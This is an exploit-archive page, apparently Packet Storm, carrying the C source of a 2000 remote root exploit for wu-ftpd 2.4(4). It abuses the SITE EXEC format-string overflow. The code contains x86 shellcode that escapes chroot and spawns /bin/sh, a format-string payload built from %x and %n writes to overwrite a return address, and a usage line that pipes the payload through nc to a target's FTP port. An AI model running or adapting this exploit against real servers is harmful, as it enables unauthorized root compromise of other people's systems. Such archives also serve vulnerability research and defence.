what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

wu-ftpd-v2.4.4.c

wu-ftpd-v2.4.4.c
Posted Jul 21, 2000
Authored by Pascal Bouchareine

Wu-ftpd v2.4(4) remote root exploit. Exploits the SITE EXEC buffer overflow.

tags | exploit, remote, overflow, root
SHA-256 | 30ef02937719df0ad119e5858cca2726768166acf8b807fa9b407db7a9340c28
Download | Favorite | View

wu-ftpd-v2.4.4.c

Change Mirror Download
/*
 * Sample example - part 2: wu-ftpd v2.4(4), exploitation.
 *
 * usage:
 *  1) find the right address location/eggshell location
 *     this is easy with a little play around %s and hexdump.
 *     Then, fix this exploit.
 *
 *  2) (echo "user ftp"; ./exploit; cat) | nc host 21
 *
 *      echo ^[c to clear your screen if needed.
 *
 *  Don't forget 0xff must be escaped with 0xff.
 *
 *               Pascal Bouchareine [ kalou <pb@grolier.fr> ]
 */

main()
{
  char b1[255];
  char b2[255];
  char b3[255];
  char b4[255];
  char xx[600];
  int  i;

  char egg[]= /* Lam3rZ chroot() code */
   "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
   "\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
   "\xeb\x6b\x5e\x31\xc0\x31"
   "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
   "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
   "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
   "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
   "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
   "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
   "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
   "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

//  ( (void (*)()) egg)();

  memset(b1, 0, 255);
  memset(b2, 0, 255);
  memset(b3, 0, 255);
  memset(b4, 0, 255);
  memset(xx, 0, 513);

  for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */
    strcpy(&xx[i], "%x");
  }

  memset(b1, '\x90', 0xa3 - 0x50);
  memset(b2, '\x90', 0xfe - 0xa3 - 2);
  memset(b3, '\x90', 0xff - 0xfe);
  memset(b4, '\x90', 0x01bf - 0xff);     // build ret address here.
                                         // i found 0xbffffea3

  printf("pass %s@oonanism.com\n", egg);
  printf("site exec .."
         "\x64\xf9\xff\xff\xbf"  // insert ret location there.
         "\x65\xf9\xff\xff\xbf"  // i had 0xbffff964
         "\x66\xf9\xff\xff\xbf"
         "\x67\xf9\xff\xff\xbf"
         "%s"
         "%s\xeb\x02%%n"
         "%s\xeb\x02%%n"
         "%s%%n"
         "%s%%n\n"
         , xx, b1, b2, b3, b4);

}
/*                    www.hack.co.za           [19 July]*/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close